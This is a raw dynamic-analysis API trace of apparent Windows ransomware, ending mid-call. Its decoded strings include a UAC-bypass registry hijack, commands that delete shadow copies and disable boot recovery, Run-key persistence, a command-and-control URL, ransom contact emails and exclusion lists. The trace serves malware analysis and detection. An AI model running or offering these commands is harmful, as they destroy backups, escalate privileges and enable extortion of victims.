0x50d64c [0098.022] SizeofResource (hModule=0x400000, hResInfo=0x51c330) returned 0x26 [0098.022] LockResource (hResData=0x50d64c) returned 0x50d64c [0098.022] GetCPInfo (in: CodePage=0xfde9, lpCPInfo=0x12fa3c | out: lpCPInfo=0x12fa3c) returned 1 [0098.023] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1524f60, cbMultiByte=38, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0098.023] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, 
lpMultiByteStr=0x1524f60, cbMultiByte=38, lpWideCharStr=0x151de4c, cchWideChar=38 | out: lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P\r\n42\r\n") returned 38 [0098.023] FreeResource (hResData=0x50d64c) returned 0 [0098.023] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0098.023] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x1524f64, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", lpUsedDefaultChar=0x0) returned 32 [0098.023] GetCurrentThreadId () returned 0xbc0 [0098.023] GetCurrentThreadId () returned 0xbc0 [0098.023] GetCurrentThreadId () returned 0xbc0 [0098.023] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x14dcd18, cbMultiByte=239, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 239 [0098.023] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x14dcd18, cbMultiByte=239, lpWideCharStr=0x14e2e7c, cchWideChar=239 | out: lpWideCharStr="13StarterProcessMutex4\r\n24MainProcessMutex5\r\n35Brother1ProcessMutex6\r\n46Brother2ProcessMutex7\r\n300\r\nCOSLb0cVd9bCx1vp\r\nhttp://statcs.s76.r53.com.ua\r\n131072\r\nbluetablet9643@yahoo.com\r\ndecodedecode@yandex.ru\r\nBl0cked-ReadMe.rtf\r\ndesktop.ini\r\n") returned 239 [0098.023] GetCurrentThreadId () returned 0xbc0 [0098.023] GetCurrentThreadId () returned 0xbc0 [0098.023] GetCurrentThreadId () returned 0xbc0 [0098.023] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"START\" \"60000\"" [0098.023] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x14d399c, 
nSize=0x8000 | out: lpDst="C:\\Users\\EEBsYm5") returned 0x11 [0098.023] ExpandEnvironmentStringsW (in: lpSrc="%TEMP%", lpDst=0x14d399c, nSize=0x8000 | out: lpDst="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp") returned 0x24 [0098.023] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x14d39b4, csidl=26, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 1 [0098.073] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x14d39b4, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5\\AppData\\Local") returned 1 [0098.074] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x14d39b4, csidl=7, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 1 [0098.074] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x14d39b4, csidl=24, fCreate=0 | out: pszPath="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 1 [0098.075] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x14d39b4, csidl=0, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0098.076] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x14d39b4, csidl=25, fCreate=0 | out: pszPath="C:\\Users\\Public\\Desktop") returned 1 [0098.076] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x14d39b4, csidl=32, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files") returned 1 [0098.077] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x14d39b4, csidl=41, fCreate=0 | out: pszPath="C:\\Windows\\system32") returned 1 [0098.078] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x14d39b4, csidl=40, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5") returned 1 [0098.079] ExpandEnvironmentStringsW (in: lpSrc="%COMPUTERNAME%", lpDst=0x14bc63c, nSize=0x8000 | out: lpDst="CRH2YWU7") returned 0x9 [0098.079] ExpandEnvironmentStringsW (in: lpSrc="%USERNAME%", lpDst=0x14bc63c, nSize=0x8000 | out: lpDst="EEBsYm5") returned 0x8 [0098.079] ExpandEnvironmentStringsW (in: 
lpSrc="%APPDATA%", lpDst=0x14bc63c, nSize=0x8000 | out: lpDst="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x21 [0098.079] ExpandEnvironmentStringsW (in: lpSrc="%ALLUSERSPROFILE%", lpDst=0x14bc63c, nSize=0x8000 | out: lpDst="C:\\ProgramData") returned 0xf [0098.079] FindResourceW (hModule=0x400000, lpName="CMDS", lpType=0xa) returned 0x51c380 [0098.079] LoadResource (hModule=0x400000, hResInfo=0x51c380) returned 0x50d72c [0098.079] SizeofResource (hModule=0x400000, hResInfo=0x51c380) returned 0x582 [0098.079] LockResource (hResData=0x50d72c) returned 0x50d72c [0098.079] FreeResource (hResData=0x50d72c) returned 0 [0098.080] FindResourceW (hModule=0x400000, lpName="CHAK", lpType=0xa) returned 0x51c330 [0098.080] LoadResource (hModule=0x400000, hResInfo=0x51c330) returned 0x50d64c [0098.080] SizeofResource (hModule=0x400000, hResInfo=0x51c330) returned 0x26 [0098.080] LockResource (hResData=0x50d64c) returned 0x50d64c [0098.080] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1525008, cbMultiByte=38, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0098.080] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1525008, cbMultiByte=38, lpWideCharStr=0x151deac, cchWideChar=38 | out: lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P\r\n42\r\n") returned 38 [0098.080] FreeResource (hResData=0x50d64c) returned 0 [0098.080] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0098.080] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x152500c, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", lpUsedDefaultChar=0x0) returned 32 [0098.080] 
GetCurrentThreadId () returned 0xbc0 [0098.080] GetCurrentThreadId () returned 0xbc0 [0098.080] GetCurrentThreadId () returned 0xbc0 [0098.080] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x14be688, cbMultiByte=1410, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 1410 [0098.080] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x14be688, cbMultiByte=1410, lpWideCharStr=0x14d9afc, cchWideChar=1410 | out: lpWideCharStr="%CD%\r\n%SystemRoot%\\system32\\cmd.exe\r\n%SystemRoot%\\system32\\shell32.dll\r\nreg copy \"HKCR\\mscfile\" \"HKCU\\Software\\Classes\\mscfile\" /s /f && reg add \"HKCU\\Software\\Classes\\mscfile\\shell\\open\\command\" /ve /t REG_EXPAND_SZ /d \"[MAIN_PATH]\" /f && \"[AE_PATH]\" & reg delete \"HKCU\\Software\\Classes\\mscfile\" /f\r\nprocess call create \"cmd.exe /c vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures\"\r\nvssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures\r\nCACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"\r\nreg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /v \"[HTA_NAME]\" /t REG_SZ /f /d \"\\\"[HTA_PATH]\"\\\"\r\ntype \"[FROM_PATH]\" > \"[TO_PATH]\"\r\ntype \"[FROM_PATH]\" > \"[TO_PATH]\" && \"[TO_PATH]\" [PARAMS]\r\nattrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"[FROM_PATH]\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"\r\nexplorer.exe \"[DIR_NAME]\" & type \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"\r\nreg add \"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons\" /f && reg add \"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons\" /v \"29\" /t REG_SZ /f /d \"[ICO_PATH],0\"\r\ntaskkill /f /IM 
explorer.exe && start explorer.exe\r\n") returned 1410 [0098.080] GetCurrentThreadId () returned 0xbc0 [0098.080] GetCurrentThreadId () returned 0xbc0 [0098.080] GetCurrentThreadId () returned 0xbc0 [0098.080] GetCurrentThread () returned 0xfffffffe [0098.080] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x8, OpenAsSelf=1, TokenHandle=0x12fc64 | out: TokenHandle=0x12fc64*=0x0) returned 0 [0098.080] GetLastError () returned 0x3f0 [0098.080] GetCurrentProcess () returned 0xffffffff [0098.080] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x12fc64 | out: TokenHandle=0x12fc64*=0xb8) returned 1 [0098.080] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x2, TokenInformation=0x14d7ae0, TokenInformationLength=0x400, ReturnLength=0x12fc60 | out: TokenInformation=0x14d7ae0, ReturnLength=0x12fc60) returned 1 [0098.080] CloseHandle (hObject=0xb8) returned 1 [0098.081] AllocateAndInitializeSid (in: pIdentifierAuthority=0x4e3754, nSubAuthorityCount=0x2, nSubAuthority0=0x20, nSubAuthority1=0x220, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x12fc5c | out: pSid=0x12fc5c*=0x726428*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1 [0098.081] EqualSid (pSid1=0x726428*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), pSid2=0x14d7b44*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65))) returned 0 [0098.081] EqualSid (pSid1=0x726428*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), 
pSid2=0x14d7b60*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0)) returned 0 [0098.081] EqualSid (pSid1=0x726428*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), pSid2=0x14d7b6c*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1 [0098.081] GetCurrentProcess () returned 0xffffffff [0098.081] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x12fc68 | out: TokenHandle=0x12fc68*=0xb8) returned 1 [0098.081] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x12fc64 | out: TokenInformation=0x0, ReturnLength=0x12fc64) returned 0 [0098.081] GetLastError () returned 0x7a [0098.081] LocalAlloc (uFlags=0x0, uBytes=0x14) returned 0x7276c8 [0098.081] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x7276c8, TokenInformationLength=0x14, ReturnLength=0x12fc64 | out: TokenInformation=0x7276c8, ReturnLength=0x12fc64) returned 1 [0098.081] GetSidSubAuthorityCount (pSid=0x7276d0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000)) returned 0x7276d1 [0098.081] GetSidSubAuthority (pSid=0x7276d0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000), nSubAuthority=0x0) returned 0x7276d8 [0098.081] LocalFree (hMem=0x7276c8) returned 0x0 [0098.081] CloseHandle (hObject=0xb8) returned 1 [0098.081] GetDriveTypeW (lpRootPathName="Z:\\") returned 0x1 [0098.081] GetDriveTypeW (lpRootPathName="Y:\\") returned 0x1 [0098.081] GetDriveTypeW (lpRootPathName="X:\\") 
returned 0x1 [0098.081] GetDriveTypeW (lpRootPathName="W:\\") returned 0x1 [0098.081] GetDriveTypeW (lpRootPathName="V:\\") returned 0x1 [0098.081] GetDriveTypeW (lpRootPathName="U:\\") returned 0x1 [0098.082] GetDriveTypeW (lpRootPathName="T:\\") returned 0x1 [0098.082] GetDriveTypeW (lpRootPathName="S:\\") returned 0x1 [0098.082] GetDriveTypeW (lpRootPathName="R:\\") returned 0x1 [0098.082] GetDriveTypeW (lpRootPathName="Q:\\") returned 0x1 [0098.082] GetDriveTypeW (lpRootPathName="P:\\") returned 0x1 [0098.082] GetDriveTypeW (lpRootPathName="O:\\") returned 0x1 [0098.082] GetDriveTypeW (lpRootPathName="N:\\") returned 0x1 [0098.082] GetDriveTypeW (lpRootPathName="M:\\") returned 0x1 [0098.082] GetDriveTypeW (lpRootPathName="L:\\") returned 0x1 [0098.082] GetDriveTypeW (lpRootPathName="K:\\") returned 0x1 [0098.082] GetDriveTypeW (lpRootPathName="J:\\") returned 0x1 [0098.083] GetDriveTypeW (lpRootPathName="I:\\") returned 0x1 [0098.083] GetDriveTypeW (lpRootPathName="H:\\") returned 0x1 [0098.083] GetDriveTypeW (lpRootPathName="G:\\") returned 0x1 [0098.083] GetDriveTypeW (lpRootPathName="F:\\") returned 0x1 [0098.083] GetDriveTypeW (lpRootPathName="E:\\") returned 0x1 [0098.083] GetDriveTypeW (lpRootPathName="D:\\") returned 0x1 [0098.083] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0098.083] FindResourceW (hModule=0x400000, lpName="NDNF", lpType=0xa) returned 0x51c420 [0098.083] LoadResource (hModule=0x400000, hResInfo=0x51c420) returned 0x516824 [0098.083] SizeofResource (hModule=0x400000, hResInfo=0x51c420) returned 0x267 [0098.083] LockResource (hResData=0x516824) returned 0x516824 [0098.083] FreeResource (hResData=0x516824) returned 0 [0098.083] FindResourceW (hModule=0x400000, lpName="CHAK", lpType=0xa) returned 0x51c330 [0098.083] LoadResource (hModule=0x400000, hResInfo=0x51c330) returned 0x50d64c [0098.083] SizeofResource (hModule=0x400000, hResInfo=0x51c330) returned 0x26 [0098.083] LockResource (hResData=0x50d64c) returned 0x50d64c [0098.083] 
MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1525008, cbMultiByte=38, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0098.083] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1525008, cbMultiByte=38, lpWideCharStr=0x151deac, cchWideChar=38 | out: lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P\r\n42\r\n") returned 38 [0098.083] FreeResource (hResData=0x50d64c) returned 0 [0098.083] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0098.084] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x152500c, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", lpUsedDefaultChar=0x0) returned 32 [0098.084] GetCurrentThreadId () returned 0xbc0 [0098.084] GetCurrentThreadId () returned 0xbc0 [0098.084] GetCurrentThreadId () returned 0xbc0 [0098.084] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x14b0128, cbMultiByte=615, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 615 [0098.084] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x14b0128, cbMultiByte=615, lpWideCharStr=0x14bc65c, cchWideChar=615 | out: 
lpWideCharStr="[NF_START]\r\nAST\r\nAFN\r\nELST\r\nEXE\r\nLNK\r\nHTA\r\nPEK\r\nSEK\r\nB10CKED\r\nTMP\r\nICO\r\n000\r\nSYS\r\nDAT\r\nRTF\r\nINF\r\nDLL\r\nDAT\r\nREG\r\nDRV\r\nDEV\r\nPIF\r\nMBR\r\nINI\r\nXML\r\nLIST\r\nTTF\r\nLOG\r\nJA\r\nCOM\r\nBAT\r\nCMD\r\nVBS\r\nJS\r\nCFG\r\nDOWNLOAD\r\nNFO\r\nMSI\r\nCHK\r\nDMP\r\nMUI\r\nDUN\r\nISP\r\nISW\r\nCAB\r\nEFI\r\nHLP\r\nMSU\r\nHLP\r\nBIN\r\nLNG\r\nTORRENT_INFO\r\nTORRENT\r\nHTM\r\nHTML\r\nCHM\r\nLANG\r\nSTYLE\r\nMP3\r\nFLAC\r\nOGG\r\nWMA\r\nGIF\r\nJAVA\r\nCUR\r\nANI\r\n[NF_END]\r\n[ND_START]\r\n\\WINDOWS\r\n\\PROGRAM FILES\r\n\\GAMES\r\n\\APPDATA\\\r\n\\APPLICATION DATA\\\r\n\\LOCAL SETTINGS\\\r\n\\TEMP\\\r\n\\PROGRAMDATA\\\r\n\\BOOT\\\r\n\\MSOCACHE\\\r\n\\DEFAULT USER\\\r\n\\SAMPLE\r\n\\EXAMPLE\r\n\\I386\r\n\\TEMPORARY\r\n\\TOR BROWSER\\\r\n\\BROWSER\r\nBROWSER\\\r\n[ND_END]") returned 615 [0098.084] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_START]", cchCount1=10, lpString2="[NF_START]", cchCount2=10) returned 2 [0098.084] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_START]", cchCount1=10, lpString2="[NF_END]", cchCount2=8) returned 3 [0098.084] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AST", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0098.084] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AFN", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0098.084] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ELST", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0098.084] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EXE", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0098.084] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNK", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0098.084] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTA", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0098.084] CompareStringW (Locale=0x400, dwCmpFlags=0x1, 
lpString1="PEK", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0098.084] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0098.084] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B10CKED", cchCount1=7, lpString2="[NF_END]", cchCount2=8) returned 3 [0098.084] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0098.084] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0098.084] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="000", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0098.084] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SYS", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0098.084] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0098.084] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0098.084] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INF", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0098.084] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0098.084] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0098.084] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REG", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0098.084] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DRV", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0098.084] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEV", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0098.084] CompareStringW (Locale=0x400, dwCmpFlags=0x1, 
lpString1="PIF", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0098.084] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MBR", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0098.084] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INI", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0098.084] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0098.084] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LIST", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0098.084] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TTF", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0098.084] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0098.084] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JA", cchCount1=2, lpString2="[NF_END]", cchCount2=8) returned 3 [0098.085] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="COM", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0098.085] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BAT", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0098.085] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CMD", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0098.085] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0098.085] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JS", cchCount1=2, lpString2="[NF_END]", cchCount2=8) returned 3 [0098.085] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CFG", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0098.085] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DOWNLOAD", cchCount1=8, lpString2="[NF_END]", cchCount2=8) returned 3 [0098.085] CompareStringW (Locale=0x400, dwCmpFlags=0x1, 
lpString1="NFO", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0098.085] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSI", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0098.085] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHK", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0098.085] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DMP", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0098.085] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MUI", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0098.085] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DUN", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0098.085] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISP", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0098.085] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISW", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0098.085] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CAB", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0098.085] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EFI", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0098.085] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0098.085] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSU", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0098.085] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0098.085] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BIN", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0098.085] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNG", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0098.085] CompareStringW (Locale=0x400, dwCmpFlags=0x1, 
